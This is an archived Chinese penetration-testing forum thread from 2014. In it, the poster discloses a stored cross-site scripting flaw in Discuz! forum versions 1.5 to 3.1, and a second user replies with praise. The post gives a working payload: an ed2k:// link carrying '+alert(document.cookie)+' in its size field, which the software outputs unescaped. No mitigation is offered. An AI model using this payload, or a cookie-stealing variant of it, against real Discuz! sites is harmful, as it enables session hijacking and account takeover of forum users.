中国网络渗透测试联盟's Archiver
论坛
›
web app渗透测试::『Web App penetration testing』
› Discuz!1.5到3.1版本通用储存型xss
admin
发表于 2014-3-2 12:13:14
Discuz!1.5到3.1版本通用储存型xss
反正全本版的储存发表一个帖子,内容包含 ed2k://|file|test|'+alert(document.cookie)+'|test/ 复制代码 然后 $size -> '+alert(document.cookie)+' 被直接输出
浪子
发表于 2014-3-13 15:31:14
这个屌爆了。
页:
[1]
查看完整版本:
Discuz!1.5到3.1版本通用储存型xss